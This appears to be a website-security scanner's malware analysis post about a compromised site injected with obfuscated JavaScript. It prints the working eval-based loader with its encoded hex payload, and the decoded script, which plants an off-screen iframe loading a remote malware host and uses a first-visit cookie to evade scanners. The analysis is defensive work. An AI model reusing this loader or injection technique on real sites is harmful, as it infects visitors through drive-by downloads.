Compromised website infected with malicious JavaScript
Background
Online Website Malware Scanner has identified a malicious JavaScript code injection in the scanned website. The obfuscated JavaScript malware injects malicious iframes into the website page(s). Their styling attributes are crafted so that they are invisible to website visitors, while they download content in the background from a remote malware distributor.
As discussed in other posts about malicious iframes in websites, this malware is obfuscated and additionally uses a cookie bomb technique to evade anti-virus engines and other detection mechanisms: the decoded payload sets a marker cookie and injects the iframe only when that cookie is absent, so a repeat visit from the same browser renders a clean page.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites).
Malware entry details
Obfuscated execution of the JavaScript "eval" function. Beautified script:
- // Loader stage of the injection, as beautified by the scanner. The real
- // payload is the "^"-separated hex token list assigned to `z` below; `aa`
- // turns it back into source text and the final `e("" + za)` hands it to eval.
- // Indicators worth matching on: an indirect alias of eval, a "fromCharCode"
- // name assembled from string fragments, and a long "^"-delimited hex string.
- try {
- + function () {
- if (document.querySelector)++(window[vz].body) == null
- }()
- } catch (q) {
- // `vz` is not declared anywhere in this listing, so on any browser that has
- // document.querySelector the ++ above throws and control lands here. The
- // decoder is only defined inside the catch handler, which breaks static
- // emulation that does not model the exception.
- aa = function (ff) {
- ff = "fr" + "omCh" + ff;   // assembles "fromCharCode" from fragments
- for (i = 0; i < z.length; i++) {
- // each token is prefixed with "0x" (see `v`), evaluated to a number via the
- // eval alias `e`, and shifted down by 13 before becoming one character
- za += String[ff](e(v + (z[i])) - (13));
- }
- };
- };
- e = (eval);   // every later `e(...)` call is an indirect eval
- v = "0x";
- a = 0;
- try {;
- } catch (zz) {
- a = 1
- }
- if (!a) {
- try {
- ++e(vz)["\x62o" + "d" + z]
- } catch (q) {
- // `vz` (and `z`) are undeclared here, so the access throws and the token
- // separator is only ever set inside this handler
- a2 = "^";
- }
- // Encoded payload: each token is (charCode + 13) in hex; it decodes to the
- // script shown under "Malicious payload" (first tokens spell " function rp09").
- z ="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7d^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^2d^83^6e^7f^2d^7f^7d^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7f^72^6e^81^72^52^79^72^7a^72^7b^81^35^34^76^73^7f^6e^7a^72^34^36^48^1a^17^1a^17^2d^7f^7d^3b^80^7f^70^2d^4a^2d^34^75^81^81^7d^47^3c^3c^7a^6e^7b^74^7c^79^3b^70^7c^3b^82^78^3c^70^79^6e^80^80^3c^44^57^5e^45^81^5f^58^59^3b^7d^75^7d^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^7d^7c^80^76^81^76^7c^7b^2d^4a^2d^34^6e^6f^80^7c^79^82^81^72^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^70^7c^79^7c^7f^2d^4a^2d^34^3d^45^43^45^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^75^72^76^74^75^81^2d^4a^2d^34^3d^45^43^45^7d^85^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^84^76^71^81^75^2d^4a^2d^34^3d^45^43^45^7d^85^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^79^72^73^81^2d^4a^2d^34^3e^3d^3d^3d^3d^45^43^45^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^81^7c^7d^2d^4a^2d^34^3e^3d^3d^3d^3d^45^43^45^34^48^1a^17^1a^17^2d^76^73^2d^35^2e^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7f^7d^34^36^36^2d^88^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^84^7f^76^81^72^35^34^49^7d^2d^76^71^4a^69^34^7f^7d^69^34^2d^70^79^6e^80^80^4a^69^34^7f^7d^3d^46^69^34^2d^4b^49^3c^7d^4b^34^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7f^7d^34^36^3b^6e^7d^7d^72^7b^71^50^75^76^79^71^35^7f^7d^36^48^1a^17^2d^8a^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^60^72^81^50^7c^7c^78^76^72^35^70^7c^7c^78^76^72^5b^6e^7a^72^39^70^7c^7c^78^76^72^63^6e^79^82^72^39^7b^51^6e^86^80^39^7d^6e^81^75^36^2d^88^1a^17^2d^83^6e^7f^2d^81^7c^71^6e^86^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^83^6e^7f^2d^72^85^7d^76^7f^72^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^76^73^2d^35^7b^51^6e^86^80^4a^4a^7b^82^79^79^2d^89^89^2d^7b^51^6e^86^80^4a^4a^3d^36^2d^7b^51^6e^86^80^4a^3e^48^1a^17^2d^72^85^7d^76^7f^72^3b^80^72^81^61
^76^7a^72^35^81^7c^71^6e^86^3b^74^72^81^61^76^7a^72^35^36^2d^38^2d^40^43^3d^3d^3d^3d^3d^37^3f^41^37^7b^51^6e^86^80^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^2d^4a^2d^70^7c^7c^78^76^72^5b^6e^7a^72^38^2f^4a^2f^38^72^80^70^6e^7d^72^35^70^7c^7c^78^76^72^63^6e^79^82^72^36^1a^17^2d^38^2d^2f^48^72^85^7d^76^7f^72^80^4a^2f^2d^38^2d^72^85^7d^76^7f^72^3b^81^7c^54^5a^61^60^81^7f^76^7b^74^35^36^2d^38^2d^35^35^7d^6e^81^75^36^2d^4c^2d^2f^48^2d^7d^6e^81^75^4a^2f^2d^38^2d^7d^6e^81^75^2d^47^2d^2f^2f^36^48^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^54^72^81^50^7c^7c^78^76^72^35^2d^7b^6e^7a^72^2d^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^7f^81^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^7b^6e^7a^72^2d^38^2d^2f^4a^2f^2d^36^48^1a^17^2d^83^6e^7f^2d^79^72^7b^2d^4a^2d^80^81^6e^7f^81^2d^38^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^38^2d^3e^48^1a^17^2d^76^73^2d^35^2d^35^2d^2e^80^81^6e^7f^81^2d^36^2d^33^33^1a^17^2d^35^2d^7b^6e^7a^72^2d^2e^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^3d^39^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^36^2d^36^2d^36^1a^17^2d^88^1a^17^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^8a^1a^17^2d^76^73^2d^35^2d^80^81^6e^7f^81^2d^4a^4a^2d^3a^3e^2d^36^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^83^6e^7f^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^2f^48^2f^39^2d^79^72^7b^2d^36^48^1a^17^2d^76^73^2d^35^2d^72^7b^71^2d^4a^4a^2d^3a^3e^2d^36^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^79^72^7b^74^81^75^48^1a^17^2d^7f^72^81^82^7f^7b^2d^82^7b^72^80^70^6e^7d^72^35^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^7
2^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7d^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);
- za = "";
- aa("arCode");   // ff becomes "fr" + "omCh" + "arCode" = "fromCharCode"
- e("" + za);   // executes the decoded payload
- }
Malicious payload
The decoded payload generates a hidden iframe pointing to hxxp://mangol.co.uk
- // Decoded payload, stage 1: builds the hidden iframe that loads the external
- // content. The src host is the URL cited under "Blacklisting status" below.
- function rp09() {
- var static = 'ajax';   // unused in this listing
- var controller = 'index.php';   // unused in this listing
- var rp = document.createElement('iframe');
- rp.src = 'http://mangol.co.uk/class/7JQ8tRKL.php';
- // style values as decoded; together they keep the frame out of the
- // visitor's view (absolute positioning with very large left/top offsets)
- rp.style.position = 'absolute';
- rp.style.color = '0868';
- rp.style.height = '0868px';
- rp.style.width = '0868px';
- rp.style.left = '10000868';
- rp.style.top = '10000868';
- // inserts once per page: a <p id='rp'> container is written into the
- // document and the iframe appended to it; the id check prevents a second
- // insertion. document.write presumably relies on running while the page is
- // still being parsed.
- if (!document.getElementById('rp')) {
- document.write('<p id=\'rp\' class=\'rp09\' ></p>');
- document.getElementById('rp').appendChild(rp);
- }
- }
- // Decoded payload, stage 2: cookie helpers used to throttle the injection.
- // Writes cookieName=cookieValue with an expiry nDays ahead (defaults to 1 day
- // when nDays is null/undefined or 0) and an optional path attribute.
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);   // 3600000 ms = 1 hour
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- // Returns the unescaped value of cookie `name` from document.cookie, or null
- // when no such cookie is present.
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;   // index just past "name="
- // start === 0 is falsy too: only treat it as "not found" when the cookie
- // string does not actually begin with the name
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;   // last cookie, no trailing ";"
- return unescape(document.cookie.substring(len, end));
- }
- // Entry point of the decoded payload: the iframe is injected only when the
- // marker cookie is absent, and the marker is then set for one day on path "/".
- // This is the cookie-based evasion the post refers to: a repeat visit from the
- // same browser renders a clean page, so any scan that re-uses cookies between
- // fetches will not see the iframe; re-check suspect pages with a fresh cookie
- // jar. The trailing "*/" on the last line is presumably an artifact of how the
- // sample was captured, not part of the payload.
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- rp09();
- }
- }*/
Blacklisting status
The URL is detected by 3/51 anti-virus engines in VirusTotal and is noted as infecting several domains through software vulnerability exploits. VirusTotal report
Malware clean-up
Being blacklisted usually means your website was compromised and was detected actively distributing malware or acting as an intermediary in a malicious chain. If you suspect that your website was infected, use Website Anti-malware Monitoring for malware removal. Alternatively, you can try to remove the malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removal from the blacklist.